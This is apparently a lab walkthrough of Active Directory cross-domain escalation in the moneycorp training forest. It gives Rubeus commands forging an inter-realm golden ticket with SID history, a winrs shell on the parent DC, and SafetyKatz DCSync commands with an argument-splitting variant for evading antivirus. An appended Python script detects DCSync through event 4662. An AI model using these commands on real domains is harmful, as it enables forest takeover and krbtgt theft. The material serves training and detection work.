Using DA access to dollarcorp.moneycorp.local, escalate privileges to Enterprise Admin or DA on the parent domain, moneycorp.local, using dollarcorp's krbtgt hash.
Since we already have the krbtgt hash from dcorp-dc, we can create the inter-realm TGT and inject it.
C:\AD\Tools\Loader.exe -path C:\AD\Tools\Rubeus.exe -args golden /user:Administrator /id:500 /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-719815819-3726368948-3917688648 /sids:S-1-5-21-335606122-960912869-3279953914-519 /aes256:154cb6624b1d859f7080a6615adc488f09f92843879b3d914cbcb5a8c3cda848 /netbios:dcorp /ptt
winrs -r:mcorp-dc.moneycorp.local cmd
C:\Users\Administrator.dcorp>set username
set username
USERNAME=Administrator
C:\Users\Administrator.dcorp>set computername
set computername
COMPUTERNAME=MCORP-DC
C:\Users\Administrator.dcorp>
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "lsadump::dcsync /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
# ArgSplit for "lsadump::dcsync"
C:\AD\Tools\Loader.exe -path C:\AD\Tools\SafetyKatz.exe -args "%Pwn% /user:mcorp\krbtgt /domain:moneycorp.local" "exit"
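A defender-side check for the DCSync step above, added here as an example and not part of the original walkthrough: it scans event 4662 records from the parent-domain DC for directory replication rights exercised by an account that is not an expected replicator. The flattened key=value record layout, the sample events and the allowlist are constructed assumptions, and 4662 is only logged when Directory Service Access auditing is enabled on the DC.

```python
import re

# Control-access-right GUIDs for directory replication (AD schema constants).
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
}
GUID_RE = re.compile(r"[0-9a-f]{8}(?:-[0-9a-f]{4}){3}-[0-9a-f]{12}")

# Assumption: the only principal expected to replicate from the parent DC.
ALLOWED_REPLICATORS = {("MCORP", "MCORP-DC$")}

# Constructed sample records (event fields flattened to key=value pairs).
SAMPLE_EVENTS = [
    "EventID=4662 Computer=mcorp-dc.moneycorp.local SubjectDomainName=mcorp SubjectUserName=MCORP-DC$ Properties={1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
    "EventID=4624 Computer=mcorp-dc.moneycorp.local TargetDomainName=dcorp TargetUserName=Administrator LogonType=3",
    "EventID=4662 Computer=mcorp-dc.moneycorp.local SubjectDomainName=dcorp SubjectUserName=Administrator Properties={bf967aba-0de6-11d0-a285-00aa003049e2}",
    "EventID=4662 Computer=mcorp-dc.moneycorp.local SubjectDomainName=dcorp SubjectUserName=Administrator Properties={1131f6aa-9c07-11d1-f79f-00c04fc2dcd2},{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}",
]


def parse(line):
    """Turn one flattened record into a dict of field name -> value."""
    return dict(re.findall(r"(\w+)=(\S+)", line))


def find_unexpected_replication(lines, allowed=ALLOWED_REPLICATORS):
    """Return 4662 records where a non-allowlisted account used replication rights."""
    hits = []
    for line in lines:
        ev = parse(line)
        if ev.get("EventID") != "4662":
            continue  # only directory object access events are relevant
        guids = set(GUID_RE.findall(ev.get("Properties", "").lower()))
        rights = sorted(REPL_RIGHTS[g] for g in REPL_RIGHTS.keys() & guids)
        who = (ev.get("SubjectDomainName", "").upper(),
               ev.get("SubjectUserName", "").upper())
        if rights and who not in allowed:
            hits.append({"account": "\\".join(who),
                         "dc": ev.get("Computer"),
                         "rights": rights})
    return hits


if __name__ == "__main__":
    for hit in find_unexpected_replication(SAMPLE_EVENTS):
        print(hit)
```

A hit whose account belongs to the child domain (DCORP) on a parent-domain DC is the pattern the walkthrough produces, since legitimate replication partners are DC machine accounts.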